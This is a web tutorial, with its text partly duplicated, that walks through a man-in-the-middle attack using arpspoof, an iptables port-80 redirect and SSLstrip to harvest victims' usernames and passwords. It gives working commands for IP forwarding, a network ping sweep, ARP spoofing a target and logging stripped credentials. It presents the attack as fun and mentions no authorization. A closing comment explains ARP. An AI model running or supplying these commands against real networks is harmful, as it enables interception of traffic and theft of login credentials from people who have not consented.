Perform a Man In The Middle Attack Using Arpspoof and SSLstrip [Published]
SSLstrip, is a tool which you can use when you're performing MITM (Man In The Middle) attacks. It's very fun to use and can often produce some very interesting results, especially when combined with other tools such as Driftnet, MSGsnarf or URLsnarf! These particular tools can uncover things such as URL's which the victim is clicking on, images from the website which the victim is currently surfing (which you can actually save onto your own PC) and even real-time chats on Instant Messaging software like IRC. SSLstrip allows you to capture login information such as usernames and passwords.
For this guide, you will need a computer with arpspoof and SSLstrip installed, as well as nmap for finding your target's IP address. I recommend downloading Backtrack as it comes with all these tools out of the box.
How to Enable IP Forwarding
Enabling IP forwarding allows packets to pass through your machine. You need this to happen so that you can get in the middle of the victim's machine and the router, hence the name "Man in the Middle". To enable IP forwarding, type this into a terminal;
How to Configure your IPtables for ARP Spoofing
Get your terminal up on the screen and type in the following;
As you can probably tell, this will to forward outgoing traffic on port 80 from the victim's machine to your machine, which is going to be running SSLstrip on port 8080.
Finding Your Target's IP address
Open a terminal and do a ping scan of the network, by issuing a command such as;
Find the machine which you want to do a MITM attack on and copy down it's IP address somewhere. That's all we need to do for this step, so move on!
How to use Arpspoof
Arpspoofing allows you to redirect packets from the victim's computer, straight to your machine. You then pass the packets along to the router as normal, meaning that the victim won't even know it's happening. After you capture traffic, SSLstrip will modify it before IPtables sends it away again. Fire up a new terminal and type in the following;
The -i flag determines the interface used, and the -t flag is your target IP address. The second IP address is that of the router. Once you hit enter, you should start to see incoming traffic traffic from the victim, which is then forwarded to the router.
How to use SSLstrip to Capture Login Credentials
Open another terminal. Navigate to /pentest/web/sslstrip and run SSLstrip by typing the following command;
This will start SSLstrip, listening on port 8080. The -w flag allows you to write your results to a file. The -k flag also kills all current sessions, forcing the client to log into websites again. Feel free to remove this flag if that's not something you want to do.
If you open another terminal window/tab and type "tail -F /root/Desktop/sslstrip.log" then you will get real-time updates as the log file is written to. When a user logs into a website, their login credentials will be displayed in the file, like this!
Re-ARPing
Hit CTRL+C to kill your ARP spoofing, your SSLstrip and anything else you've got going on. This has a very high chance of putting the whole network offline for a second, which is the only downside to ARP spoofing. However, it shouldn't be a problem as everything will right itself quickly!
Enjoy.
For this guide, you will need a computer with arpspoof and SSLstrip installed, as well as nmap for finding your target's IP address. I recommend downloading Backtrack as it comes with all these tools out of the box.
How to Enable IP Forwarding
Enabling IP forwarding allows packets to pass through your machine. You need this to happen so that you can get in the middle of the victim's machine and the router, hence the name "Man in the Middle". To enable IP forwarding, type this into a terminal;
echo 1 > /proc/sys/net/ipv4/ip_forward
How to Configure your IPtables for ARP Spoofing
Get your terminal up on the screen and type in the following;
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
As you can probably tell, this will to forward outgoing traffic on port 80 from the victim's machine to your machine, which is going to be running SSLstrip on port 8080.
Finding Your Target's IP address
Open a terminal and do a ping scan of the network, by issuing a command such as;
nmap -sP 192.168.0.1-255
Find the machine which you want to do a MITM attack on and copy down it's IP address somewhere. That's all we need to do for this step, so move on!
How to use Arpspoof
Arpspoofing allows you to redirect packets from the victim's computer, straight to your machine. You then pass the packets along to the router as normal, meaning that the victim won't even know it's happening. After you capture traffic, SSLstrip will modify it before IPtables sends it away again. Fire up a new terminal and type in the following;
arpspoof -i wlan0 -t 192.168.0.5 192.168.0.1
The -i flag determines the interface used, and the -t flag is your target IP address. The second IP address is that of the router. Once you hit enter, you should start to see incoming traffic traffic from the victim, which is then forwarded to the router.
How to use SSLstrip to Capture Login Credentials
Open another terminal. Navigate to /pentest/web/sslstrip and run SSLstrip by typing the following command;
python ./sslstrip.py -k -l 8080 -w /root/Desktop/sslstrip.log
This will start SSLstrip, listening on port 8080. The -w flag allows you to write your results to a file. The -k flag also kills all current sessions, forcing the client to log into websites again. Feel free to remove this flag if that's not something you want to do.
If you open another terminal window/tab and type "tail -F /root/Desktop/sslstrip.log" then you will get real-time updates as the log file is written to. When a user logs into a website, their login credentials will be displayed in the file, like this!
Re-ARPing
Hit CTRL+C to kill your ARP spoofing, your SSLstrip and anything else you've got going on. This has a very high chance of putting the whole network offline for a second, which is the only downside to ARP spoofing. However, it shouldn't be a problem as everything will right itself quickly!
Enjoy.
Comments
ARP is a protocol that determines what IP is assigned to which MAC address. Every NIC on your network (and the world) has a unique number usually expressed in Hexadecimal, this is called a MAC address.
By using the ARP spoofing tool, you are tricking the victims machine into thinking that your computer is the gateway (generally the router/switch).
By enabling IP forwarding you are allowing requests sent by the victim to be processed by the real gateway even though it goes through your machine. Making you the "man in the middle".
On some networks 192.168.0.1 may not be the gateway IP, On my network it's 10.1.1.1
you may need to replace this with your gateway IP.